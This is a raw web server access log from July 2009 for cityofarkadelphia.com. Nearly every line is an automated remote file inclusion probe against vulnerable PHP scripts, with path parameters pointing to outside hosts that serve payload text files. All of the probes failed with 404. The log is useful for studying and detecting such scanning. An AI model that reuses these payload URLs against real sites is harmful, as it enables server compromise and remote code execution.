66.172.22.2 - - [01/Jul/2009:03:59:16 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:04:06:09 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:04:06:09 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:04:06:09 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:06:59 -0700] "GET /logs/access.log//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:06:59 -0700] "GET /logs//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:06:59 -0700] "GET /components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:07:17 -0700] "GET /logs/access_080330.log//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:09:47 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:09:47 -0700] "GET /logs/access_080330.log%20%20//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.198.32.3 - - [01/Jul/2009:04:11:52 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.198.32.3 - - [01/Jul/2009:04:11:52 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.198.32.3 - - [01/Jul/2009:04:11:52 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.198.32.3 - - [01/Jul/2009:04:14:52 -0700] "GET /logs/access.log%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.198.32.3 - - [01/Jul/2009:04:15:21 -0700] "GET /logs/access_080531.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:20:05 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:20:05 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:20:05 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:04:20:40 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:04:20:40 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:21:58 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:21:58 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:21:58 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:27:48 -0700] "GET /logs/access_080330.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:27:48 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:27:48 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.163.139.56 - - [01/Jul/2009:04:28:29 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "cityofarkadelphia.com"
69.163.139.56 - - [01/Jul/2009:04:28:29 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "cityofarkadelphia.com"
69.163.139.56 - - [01/Jul/2009:04:28:29 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:29:08 -0700] "GET /logs/access_081001.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:29:14 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:29:14 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:29:14 -0700] "GET /logs/access_080330.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:29:23 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:29:23 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:29:23 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:04:30:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:04:30:08 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:04:30:08 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:30:31 -0700] "GET /logs/access_080330.log%20%20//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.243.139.4 - - [01/Jul/2009:04:30:42 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.243.139.4 - - [01/Jul/2009:04:30:42 -0700] "GET /templates/mangobery/footer.sample.php?Site_Path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.243.139.4 - - [01/Jul/2009:04:30:47 -0700] "GET /logs/access_080330.log%20%20//templates/mangobery/footer.sample.php?Site_Path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:30:55 -0700] "GET /logs/access_081001.log%20%20//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.147.29.190 - - [01/Jul/2009:04:31:05 -0700] "GET /logs/access_080330.log%20%20//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:33:01 -0700] "GET /logs/access.log%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:33:03 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:33:03 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:33:03 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "cityofarkadelphia.com"
69.163.139.56 - - [01/Jul/2009:04:33:24 -0700] "GET /logs/access_080531.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:33:41 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:33:41 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:33:41 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:33:44 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:33:47 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:33:47 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "cityofarkadelphia.com"
91.198.32.3 - - [01/Jul/2009:04:33:50 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.198.32.3 - - [01/Jul/2009:04:33:50 -0700] "GET /logs/access_080531.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.198.32.3 - - [01/Jul/2009:04:33:50 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.198.32.3 - - [01/Jul/2009:04:33:50 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://210.240.82.130//appserv/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:33:56 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:33:57 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:33:57 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
193.243.139.4 - - [01/Jul/2009:04:33:59 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:34:56 -0700] "GET /logs/access_081001.log%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:36:04 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:36:04 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:36:05 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:38:23 -0700] "GET /logs/access_080531.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:38:32 -0700] "GET /logs/access_080531.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:38:34 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:38:34 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:38:34 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:39:15 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:39:15 -0700] "GET /logs/access_080531.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:39:15 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:39:31 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:04:40:14 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:04:40:14 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:04:40:14 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:04:40:14 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:04:40:15 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:04:40:15 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:42:19 -0700] "GET /logs/access_080531.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:42:31 -0700] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:42:31 -0700] "GET /logs/access_080531.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:04:43:08 -0700] "GET /logs/access_080531.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:43:37 -0700] "GET /logs/access_081001.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:04:43:45 -0700] "GET /logs/access_081001.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:04:43:52 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.94.56.39 - - [01/Jul/2009:04:44:01 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:04:44:29 -0700] "GET /include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:04:44:29 -0700] "GET /logs//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:04:44:29 -0700] "GET /logs/access.log//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.254.103.223 - - [01/Jul/2009:04:46:18 -0700] "GET /logs/access.log%20%20//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:46:19 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:46:19 -0700] "GET /logs/access_080330.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:46:19 -0700] "GET /logs/access.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:04:46:19 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:04:47:49 -0700] "GET /logs//voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:04:47:49 -0700] "GET /logs/access.log//voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:04:47:53 -0700] "GET /logs//voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:04:47:53 -0700] "GET /logs/access.log//voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:04:47:53 -0700] "GET /voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:04:47:54 -0700] "GET /voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.40.150.211 - - [01/Jul/2009:04:48:23 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.zorgno.it/genealogy/LICENSE.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:04:48:41 -0700] "GET /logs/access.log%20%20//voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.222 - - [01/Jul/2009:04:48:47 -0700] "GET /logs/access.log%20%20//voir.php?inc=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
